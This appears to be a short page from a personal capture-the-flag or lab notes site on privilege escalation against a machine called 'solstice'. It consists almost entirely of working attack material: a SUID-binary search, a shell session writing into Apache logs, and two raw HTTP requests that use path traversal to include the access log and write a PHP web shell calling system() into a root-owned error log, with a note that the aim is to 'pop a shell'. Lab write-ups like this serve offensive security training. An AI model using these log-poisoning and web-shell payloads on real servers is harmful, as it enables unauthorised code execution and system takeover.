Priv Esc

find / -type f -perm -04000 -ls 2>/dev/null

www-data@solstice:/dev/shm$ cat /var/log/apache2/access.log.1
cat /var/log/apache2/access.log.1
www-data@solstice:/dev/shm$ echo test > /var/log/apache2/access.log.1
echo test > /var/log/apache2/access.log.1
www-data@solstice:/dev/shm$ ^[[A^[[A
echo test > /var/log/apache2cat.1
test
www-data@solstice:/dev/shm$

Had to revert the machine but the jist is to get RCE on the first access log and then use it to add php code into the root owned one then pop a shell

GET /index.php?book=../../../../../../var/log/apache2/access.log&cmd=echo+"<%3fphp+echo+system($_GET['cmd'])%3b%3f>"+>+/var/log/apache2/error.log.1 HTTP/1.1
Host: 192.168.184.72:8593
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.184.72:8593/
Connection: close
Cookie: PHPSESSID=r1j4rc7vl1h5k6u72jt8pfis8b
Upgrade-Insecure-Requests: 1

GET /index.php?book=../../../../../../var/log/apache2/access.log&cmd=cat+/var/log/apache2/error.log.1 HTTP/1.1
Host: 192.168.184.72:8593
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.184.72:8593/
Connection: close
Cookie: PHPSESSID=r1j4rc7vl1h5k6u72jt8pfis8b
Upgrade-Insecure-Requests: 1

PreviousEnumeration NextPriv Esc

Last updated 1 year ago